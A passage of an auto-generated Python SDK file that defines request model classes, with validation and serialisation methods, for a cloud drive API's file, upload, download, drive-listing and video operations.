self.file_path = m.get('file_path')
if m.get('new_name') is not None:
self.new_name = m.get('new_name')
if m.get('overwrite') is not None:
self.overwrite = m.get('overwrite')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('to_drive_id') is not None:
self.to_drive_id = m.get('to_drive_id')
if m.get('to_parent_file_path') is not None:
self.to_parent_file_path = m.get('to_parent_file_path')
if m.get('to_share_id') is not None:
self.to_share_id = m.get('to_share_id')
return self
class HostingCreateFileRequest(TeaModel):
"""
create file request
"""
def __init__(
self,
headers: Dict[str, str] = None,
addition_data: dict = None,
content_md_5: str = None,
content_type: str = None,
drive_id: str = None,
forbid_overwrite: bool = None,
name: str = None,
parent_file_path: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
size: int = None,
type: str = None,
):
self.headers = headers
# addition_data
self.addition_data = addition_data
# ContentMd5
self.content_md_5 = content_md_5
# ContentType
self.content_type = content_type
# drive_id
self.drive_id = drive_id
# forbid_overwrite
type: boolean
self.forbid_overwrite = forbid_overwrite
# Name
self.name = name
# parent_file_path
self.parent_file_path = parent_file_path
# part_info_list
self.part_info_list = part_info_list
# share_id
self.share_id = share_id
# Size
self.size = size
# Type
self.type = type
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_max_length(self.name, 'name', 1024)
self.validate_required(self.parent_file_path, 'parent_file_path')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.content_md_5 is not None:
result['content_md5'] = self.content_md_5
if self.content_type is not None:
result['content_type'] = self.content_type
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.forbid_overwrite is not None:
result['forbid_overwrite'] = self.forbid_overwrite
if self.name is not None:
result['name'] = self.name
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('content_md5') is not None:
self.content_md_5 = m.get('content_md5')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('forbid_overwrite') is not None:
self.forbid_overwrite = m.get('forbid_overwrite')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('type') is not None:
self.type = m.get('type')
return self
class HostingDeleteFileRequest(TeaModel):
"""
删除文件请求
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
permanently: bool = None,
share_id: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# permanently
type: false
self.permanently = permanently
# share_id
self.share_id = share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.permanently is not None:
result['permanently'] = self.permanently
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('permanently') is not None:
self.permanently = m.get('permanently')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingGetDownloadUrlRequest(TeaModel):
"""
获取文件下载地址的请求body
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
expire_sec: int = None,
file_name: str = None,
file_path: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# expire_sec
self.expire_sec = expire_sec
# file_name
self.file_name = file_name
# file_path
self.file_path = file_path
self.referer = referer
# share_id
self.share_id = share_id
self.sign_token = sign_token
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.expire_sec is not None:
self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
self.validate_minimum(self.expire_sec, 'expire_sec', 10)
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expire_sec is not None:
result['expire_sec'] = self.expire_sec
if self.file_name is not None:
result['file_name'] = self.file_name
if self.file_path is not None:
result['file_path'] = self.file_path
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expire_sec') is not None:
self.expire_sec = m.get('expire_sec')
if m.get('file_name') is not None:
self.file_name = m.get('file_name')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
return self
class HostingGetFileRequest(TeaModel):
"""
获取文件元数据
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_id
self.file_path = file_path
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
self.referer = referer
# share_id
self.share_id = share_id
self.sign_token = sign_token
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class HostingGetSecureUrlRequest(TeaModel):
"""
获取文件安全地址的请求body
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
expire_sec: int = None,
file_path: str = None,
secure_ip: str = None,
share_id: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# expire_sec 单位秒
self.expire_sec = expire_sec
# file_path
self.file_path = file_path
# secure_ip
self.secure_ip = secure_ip
# share_id
self.share_id = share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expire_sec is not None:
result['expire_sec'] = self.expire_sec
if self.file_path is not None:
result['file_path'] = self.file_path
if self.secure_ip is not None:
result['secure_ip'] = self.secure_ip
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expire_sec') is not None:
self.expire_sec = m.get('expire_sec')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('secure_ip') is not None:
self.secure_ip = m.get('secure_ip')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingGetUploadUrlRequest(TeaModel):
"""
获取文件上传URL
"""
def __init__(
self,
headers: Dict[str, str] = None,
content_md_5: str = None,
drive_id: str = None,
file_path: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
upload_id: str = None,
):
self.headers = headers
# content_md5
self.content_md_5 = content_md_5
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# upload_part_list
self.part_info_list = part_info_list
# share_id
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.content_md_5 is not None:
self.validate_max_length(self.content_md_5, 'content_md_5', 32)
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
self.validate_required(self.upload_id, 'upload_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.content_md_5 is not None:
result['content_md5'] = self.content_md_5
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('content_md5') is not None:
self.content_md_5 = m.get('content_md5')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class HostingListFileRequest(TeaModel):
"""
list file request
"""
def __init__(
self,
headers: Dict[str, str] = None,
addition_data: dict = None,
drive_id: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
marker: str = None,
parent_file_path: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
self.headers = headers
# addition_data
self.addition_data = addition_data
# drive_id
self.drive_id = drive_id
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# marker
self.marker = marker
# ParentFilePath
self.parent_file_path = parent_file_path
self.referer = referer
# share_id
self.share_id = share_id
self.sign_token = sign_token
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 0)
self.validate_required(self.parent_file_path, 'parent_file_path')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
if self.url_expire_sec is not None:
self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.image_cropping_aspect_ratios is not None:
result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.url_expire_sec is not None:
result['url_expire_sec'] = self.url_expire_sec
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('image_cropping_aspect_ratios') is not None:
self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('url_expire_sec') is not None:
self.url_expire_sec = m.get('url_expire_sec')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class HostingListUploadedPartRequest(TeaModel):
"""
列举uploadID对应的已上传分片
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
limit: int = None,
part_number_marker: int = None,
share_id: str = None,
upload_id: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# limit
self.limit = limit
# part_number_marker
self.part_number_marker = part_number_marker
# share_id
self.share_id = share_id
# upload_id
self.upload_id = upload_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 1000)
self.validate_minimum(self.limit, 'limit', 1)
if self.part_number_marker is not None:
self.validate_pattern(self.part_number_marker, 'part_number_marker', '[0-9]+')
self.validate_minimum(self.part_number_marker, 'part_number_marker', 1)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.limit is not None:
result['limit'] = self.limit
if self.part_number_marker is not None:
result['part_number_marker'] = self.part_number_marker
if self.share_id is not None:
result['share_id'] = self.share_id
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('part_number_marker') is not None:
self.part_number_marker = m.get('part_number_marker')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class HostingMoveFileRequest(TeaModel):
"""
文件移动请求
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
new_name: str = None,
overwrite: bool = None,
share_id: str = None,
to_parent_file_path: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# new_name
self.new_name = new_name
# overwrite
type: boolean
self.overwrite = overwrite
# share_id
self.share_id = share_id
# file_path
self.to_parent_file_path = to_parent_file_path
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.new_name is not None:
result['new_name'] = self.new_name
if self.overwrite is not None:
result['overwrite'] = self.overwrite
if self.share_id is not None:
result['share_id'] = self.share_id
if self.to_parent_file_path is not None:
result['to_parent_file_path'] = self.to_parent_file_path
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('new_name') is not None:
self.new_name = m.get('new_name')
if m.get('overwrite') is not None:
self.overwrite = m.get('overwrite')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('to_parent_file_path') is not None:
self.to_parent_file_path = m.get('to_parent_file_path')
return self
class HostingVideoDRMLicenseRequest(TeaModel):
"""
获取视频DRM License
"""
def __init__(
self,
headers: Dict[str, str] = None,
drm_type: str = None,
license_request: str = None,
):
self.headers = headers
# drmType
self.drm_type = drm_type
# licenseRequest
self.license_request = license_request
def validate(self):
self.validate_required(self.drm_type, 'drm_type')
self.validate_required(self.license_request, 'license_request')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drm_type is not None:
result['drmType'] = self.drm_type
if self.license_request is not None:
result['licenseRequest'] = self.license_request
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drmType') is not None:
self.drm_type = m.get('drmType')
if m.get('licenseRequest') is not None:
self.license_request = m.get('licenseRequest')
return self
class HostingVideoDefinitionRequest(TeaModel):
"""
获取视频分辨率列表
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
protection_scheme: str = None,
share_id: str = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# protection_scheme
self.protection_scheme = protection_scheme
# share_id
self.share_id = share_id
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.protection_scheme is not None:
result['protection_scheme'] = self.protection_scheme
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('protection_scheme') is not None:
self.protection_scheme = m.get('protection_scheme')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingVideoM3U8Request(TeaModel):
"""
获取视频的m3u8文件
"""
def __init__(
self,
headers: Dict[str, str] = None,
definition: str = None,
drive_id: str = None,
expire_sec: int = None,
file_path: str = None,
protection_scheme: str = None,
share_id: str = None,
sign_token: str = None,
):
self.headers = headers
# definition
self.definition = definition
# drive_id
self.drive_id = drive_id
# expire_sec
self.expire_sec = expire_sec
# file_path
self.file_path = file_path
# protection_scheme
self.protection_scheme = protection_scheme
# share_id
self.share_id = share_id
# sign_token
self.sign_token = sign_token
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.expire_sec is not None:
self.validate_maximum(self.expire_sec, 'expire_sec', 86400)
self.validate_minimum(self.expire_sec, 'expire_sec', 60)
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
self.validate_required(self.sign_token, 'sign_token')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.definition is not None:
result['definition'] = self.definition
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expire_sec is not None:
result['expire_sec'] = self.expire_sec
if self.file_path is not None:
result['file_path'] = self.file_path
if self.protection_scheme is not None:
result['protection_scheme'] = self.protection_scheme
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('definition') is not None:
self.definition = m.get('definition')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expire_sec') is not None:
self.expire_sec = m.get('expire_sec')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('protection_scheme') is not None:
self.protection_scheme = m.get('protection_scheme')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
return self
class HostingVideoTranscodeRequest(TeaModel):
"""
启动视频转码请求
"""
def __init__(
self,
headers: Dict[str, str] = None,
drive_id: str = None,
file_path: str = None,
hls_time: int = None,
protection_scheme: str = None,
remarks: str = None,
share_id: str = None,
transcode: bool = None,
):
self.headers = headers
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# hls_time
self.hls_time = hls_time
# protection_scheme
self.protection_scheme = protection_scheme
# remarks
self.remarks = remarks
# share_id
self.share_id = share_id
# transcode
self.transcode = transcode
def validate(self):
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_path, 'file_path')
if self.file_path is not None:
self.validate_max_length(self.file_path, 'file_path', 1000)
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.hls_time is not None:
result['hls_time'] = self.hls_time
if self.protection_scheme is not None:
result['protection_scheme'] = self.protection_scheme
if self.remarks is not None:
result['remarks'] = self.remarks
if self.share_id is not None:
result['share_id'] = self.share_id
if self.transcode is not None:
result['transcode'] = self.transcode
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('hls_time') is not None:
self.hls_time = m.get('hls_time')
if m.get('protection_scheme') is not None:
self.protection_scheme = m.get('protection_scheme')
if m.get('remarks') is not None:
self.remarks = m.get('remarks')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('transcode') is not None:
self.transcode = m.get('transcode')
return self
class ListByAnonymousRequest(TeaModel):
"""
list_file_by_anonymous request
"""
def __init__(
self,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
marker: str = None,
parent_file_id: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
video_thumbnail_process: str = None,
):
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# marker
self.marker = marker
# parent_file_id
self.parent_file_id = parent_file_id
self.referer = referer
# share_id
self.share_id = share_id
self.sign_token = sign_token
# video_thumbnail_process
type:string
self.video_thumbnail_process = video_thumbnail_process
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
self.validate_required(self.parent_file_id, 'parent_file_id')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
self.validate_required(self.share_id, 'share_id')
def to_map(self):
result = dict()
if self.image_thumbnail_process is not None:
result['image_thumbnail_process'] = self.image_thumbnail_process
if self.image_url_process is not None:
result['image_url_process'] = self.image_url_process
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.video_thumbnail_process is not None:
result['video_thumbnail_process'] = self.video_thumbnail_process
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('image_thumbnail_process') is not None:
self.image_thumbnail_process = m.get('image_thumbnail_process')
if m.get('image_url_process') is not None:
self.image_url_process = m.get('image_url_process')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('video_thumbnail_process') is not None:
self.video_thumbnail_process = m.get('video_thumbnail_process')
return self
class ListDriveRequest(TeaModel):
"""
List drive request
"""
def __init__(
self,
headers: Dict[str, str] = None,
limit: int = None,
marker: str = None,
owner: str = None,
):
self.headers = headers
# 每页大小限制
self.limit = limit
# 翻页标记, 接口返回的标记值
self.marker = marker
# 所属者
self.owner = owner
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.owner is not None:
result['owner'] = self.owner
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('owner') is not None:
self.owner = m.get('owner')
return self
class ListFileByCustomIndexKeyRequest(TeaModel):
"""
列举文件
"""
def __init__(
self,
starred: bool = None,
addition_data: dict = None,
category: str = None,
custom_index_key: str = None,
drive_id: str = None,
encrypt_mode: str = None,
fields: str = None,
image_cropping_aspect_ratios: List[str] = None,
image_thumbnail_process: str = None,
image_url_process: str = None,
limit: int = None,
marker: str = None,
order_direction: str = None,
referer: str = None,
share_id: str = None,
sign_token: str = None,
status: str = None,
type: str = None,
url_expire_sec: int = None,
video_thumbnail_process: str = None,
):
# starred
self.starred = starred
# addition_data
self.addition_data = addition_data
# category
self.category = category
# custom_index_key
self.custom_index_key = custom_index_key
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# fields
self.fields = fields
self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
# image_thumbnail_process
self.image_thumbnail_process = image_thumbnail_process
# image_url_process
self.image_url_process = image_url_process
# limit
self.limit = limit
# marker
self.marker = marker
# order_direction
self.order_direction = order_direction
self.referer = referer
# share_id, either share_id or drive_id is required
self.share_id = share_id
self.sign_token = sign_token
# status
self.status = status
# type
self.type = type
# url_expire_sec
self.url_expire_sec = url_expire_sec
# video_thumbnail_process
type:string
